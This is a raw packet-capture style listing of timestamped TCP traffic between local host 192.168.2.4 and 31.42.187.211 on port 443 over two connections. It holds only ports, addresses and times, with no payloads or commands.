Oct 5, 2024 01:03:21.291373014 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.291424036 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.292319059 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.292370081 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.292407036 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.292419910 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.292448997 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.292469025 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.293015957 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.293060064 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.293092012 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.293103933 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.293128967 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.293145895 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.299575090 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.316682100 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.316745996 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.316788912 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.316802025 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.316832066 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.316852093 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.317802906 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.317848921 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.317887068 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.317899942 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.317926884 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.319293976 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.319353104 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.319421053 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.319421053 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.319437027 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.319789886 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.320600033 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.320645094 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.320673943 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.320691109 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.320715904 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.320715904 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.321376085 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.321424961 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.321443081 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.321456909 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.321487904 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.321516991 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.378364086 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.378421068 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.378478050 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.378524065 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.378556967 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.378582954 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.379456997 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.379506111 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.379542112 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.379559994 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.379590034 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.379611015 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.380682945 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.380734921 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.380759001 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.380772114 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.380800009 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.380820036 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.403801918 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.403865099 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.403903961 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.403935909 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.403964043 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.404896975 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.404959917 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.404968023 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.404998064 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.405030012 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.405051947 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.406240940 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.406286955 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.406306982 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.406323910 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.406349897 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.406368971 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.407583952 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.407633066 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.407668114 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.407680988 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.407705069 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.408262014 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.408310890 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.408328056 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.408344030 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.408375025 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.408401012 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.598232985 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.598256111 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.598354101 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.598407984 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.598459005 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.598939896 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.598956108 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.598998070 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.599013090 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.599045992 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.599324942 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.600559950 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.600574017 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.600646019 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.600661039 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.600783110 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.602344036 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.602359056 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.602442980 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.602457047 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.603251934 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.603271008 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.603323936 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.603338957 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.603368044 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.603791952 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.605027914 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.605047941 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.605108976 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.605122089 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.605145931 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.605168104 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.605932951 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.605948925 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.606019974 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.606034040 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.606421947 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.607379913 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.607399940 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.608165979 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.608208895 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.608231068 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.608258009 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.608299017 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.609920025 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.609934092 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.610008955 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.610022068 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.610049009 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.610718966 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.610737085 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.610778093 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.610791922 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.610819101 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.611650944 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.611665010 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.611711025 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.611725092 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.611749887 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.612588882 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.612606049 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.612662077 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.612662077 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.612684965 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.613534927 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.613548040 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.613614082 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.613630056 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.614814997 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.614834070 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.614881039 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.614895105 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.614921093 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.615726948 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.615740061 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.615802050 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.615814924 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.665354013 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.665417910 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.665433884 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.665452003 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.665477991 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.666253090 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.666309118 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.666356087 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.666357040 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.666373014 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.667155027 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.667206049 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.667227983 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.667242050 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.667273998 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.671694040 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.671737909 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.671761036 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.671775103 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.671817064 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.673233986 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.673285961 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.673317909 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.673338890 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.673352957 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.673373938 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.674168110 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.674210072 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.674241066 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.674252987 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.674278975 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.674294949 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.674516916 CEST	443	49753	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.674581051 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.674844980 CEST	49753	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.720132113 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.720180035 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:21.720247984 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.720557928 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:21.720575094 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:22.437989950 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:22.439291000 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:22.439340115 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:22.785276890 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:22.785341978 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:22.785386086 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:22.785406113 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:22.785435915 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:22.785475016 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:22.785484076 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:22.901463032 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:22.901531935 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:22.901576042 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:22.901643991 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:22.901679039 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:22.901701927 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.022154093 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.022212029 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.022259951 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.022289038 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.022315025 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.022335052 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.023477077 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.023529053 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.023580074 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.023592949 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.023626089 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.023641109 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.026099920 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.026145935 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.026186943 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.026199102 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.026242018 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.026262045 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.027960062 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.028002977 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.028048992 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.028059959 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.028085947 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.028105974 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.144649982 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.144712925 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.144850969 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.144850969 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.144876003 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.145687103 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.145741940 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.145765066 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.145787001 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.145812988 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.145836115 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.147011995 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.147063017 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.147109032 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.147120953 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.147146940 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.147166967 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.148533106 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.148578882 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.148607969 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.148619890 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.148643017 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.148662090 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.149708033 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.149754047 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.149775982 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.149792910 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.149815083 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.150259018 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.151218891 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.151268005 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.151304960 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.151316881 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.151343107 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.155316114 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.267110109 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.267168045 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.267206907 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.267225981 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.267252922 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.267273903 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.268188000 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.268240929 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.268285990 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.268297911 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.268325090 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.268343925 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.268613100 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.268673897 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.268711090 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.268723011 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.268748045 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.270817995 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.273547888 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.273593903 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.273628950 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.273639917 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.273664951 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.273685932 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.274481058 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.274530888 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.274561882 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.274573088 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.274595976 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.275151968 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.275232077 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.275274038 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.275300980 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.275312901 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.275335073 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.275361061 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.275942087 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.275981903 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.276015997 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.276027918 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.276053905 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.276072979 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.276868105 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.276909113 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.276945114 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.276957035 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.276983976 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.277003050 CEST	49754	443	192.168.2.4	31.42.187.211
Oct 5, 2024 01:03:23.354692936 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.354763031 CEST	443	49754	31.42.187.211	192.168.2.4
Oct 5, 2024 01:03:23.354845047 CEST	49754	443	192.168.2.4	31.42.187.211
